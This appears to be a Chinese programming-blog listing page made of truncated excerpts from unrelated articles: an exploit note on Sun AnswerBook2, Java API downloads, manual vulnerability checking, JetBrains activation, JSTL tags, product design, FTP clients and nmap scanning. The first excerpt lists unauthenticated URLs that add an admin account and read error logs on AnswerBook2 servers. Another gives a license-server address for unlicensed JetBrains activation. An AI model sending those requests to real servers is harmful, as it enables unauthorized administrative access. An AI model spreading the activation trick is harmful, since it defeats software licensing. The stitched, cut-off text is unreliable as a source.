一.未授权管理脚本访问漏洞: 1.受影响版本: Sun-AnswerBook2     1.2-1.4.2 2.攻击测试手段 http://a.b.c.d:8888/ab2/@AdminViewError#访问错误日志 http://a.b.c.d:8888/ab2/@AdminAddadmin?uid=foo&password=bar&re_password=bar#添加账户(密码) 二.远程格式化字符串漏洞 1.受影响版本: Sun-AnswerBook2     1.2-1.4.2…

相信很多同人和我一样,想去官网下载一份纯英文的java API文档,可使sun公司的网站让我实在很头疼,很乱,全是英文!所以就在网上下载了别人提供的下载!可是还是不甘心!其实多去看看这些英文的技术网站很有好处!去官网下载的东西感觉也很好! 所以: 1.进入官网http://www.oracle.com/technetwork/java/index.html 2.Oracle主页 -> download下拉菜单里找到Java for development -> 按ctrl+F搜索Java SE…

0x00 前言 大家都知道在平时的漏扫中,AWVS.APPSCAN.Netspark.webspectort等漏扫工具扫描出来的漏洞问题往往存在误报,这时我们就需要进行人工手动验证漏洞,这里我们有两种思路: 一是在漏洞工具中,进行多次的重复测试,AWVS.APPSCAN.Netspark.webspectort中都有重复测试漏洞问题的功能),将得出的多次结果进行分析和统计,确认漏洞是否存在. 二是对于特定的漏洞,例如Java反序列漏 洞.struts2 各种漏洞.openssl.httpd远程拒…

快速激活最新JetBrains公司系列产品包括最新的phpstorm10 IntelliJ IDEA开源社区 提供了如下通用激活方法: 注册时选择License server 然后输入框填写:http://idea.lanyus.com/ 然后点击 OK,就搞定了. JetBrains注册码计算: idea.lanyus.com/…

JSP 本身提供的标签很少,不能满足我们日常开发需要,好在 Sun 公司自己提供了一套标签库: JSTL标签库快速入门(可点击) 目录 < c : out > 标签 < c : set > 标签 < c : remove > 标签 < c : catch > 标签 < c : choose> 标签 < c : forEach> 标签 < c : param> 标签 < c : url > 标签 < c :…

<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%> <%@ page language="java" import="cn.itcast.*" %> <%@taglib uri="http://java.sun.com/jsp/jstl/core" prefix="…

JSTL里的标签包含五大类标签: 核心标签库 国际化标签 JSTL函数(EL函数) 数据库标签// 操作数据库的,用不到了 XML标签//操作XML的,用不到了 都在jstl.jar,standar.jar 里面 standar.jar----META-INF c.tld  描述的是核心标签库 fmt.tld 描述的是国际化标签 fn.tld 描述的是EL函数 x.tld 描述的是XML标签 sql.tld 描述的是数据库标签 可以打开c.tld查看描述了哪些标签 演示核心标签库: <%@ pa…

产品设计方式 第一步:创业初期只设三个职位,产品经理.交互设计师和原型开发人员(职位可以兼任) 第二步:快速展开产品设计(高保真原型),邀请真实的目标用户验证产品原型,迭代修改 第三步:随着迭代的深入,产品会渐趋完善,当确定产品原型后,再招聘程序员进行开发…

最近因为使用FTP实现上传下载,因为已经有前辈使用了,照着敲了一遍(绝对没有复制粘贴啊,发誓).但是今天突然发现FTPClient还不一样,仔细看了看,一个是sun.net.ftp.FtpClient,一个是org.apache.commons.net.ftp.FTPClient,吓得我赶紧在网上找了找区别,仔细一看区别不是太大,还是不够细心啊,一开始竟然没发现不一样,还好亡羊补牢为时未晚. 首先我们来看一下sun的FtpClient代码: public static boolean uploa…

nmap在Kali Linux中是默认安装的.它不仅可以用来确定目标网络上计算机的存活状态,而且可以扫描各个计算机的操作系统.开放端口.服务,还有可能获得用户的证书. 命令结构: nmap -sS -T2 -p 1-500 192.168.0.100 -oN scan.txt 第一个参数: 一.-sS   隐蔽扫描.当未指定扫描选项是,隐蔽扫描时默认的扫描类型.隐蔽扫描会发起一个与目标主机的TCP连接,但是却永远  也不会完成三次握手,从而避免察觉,但是现在许多计算机系统都可以探测到这种隐蔽扫描…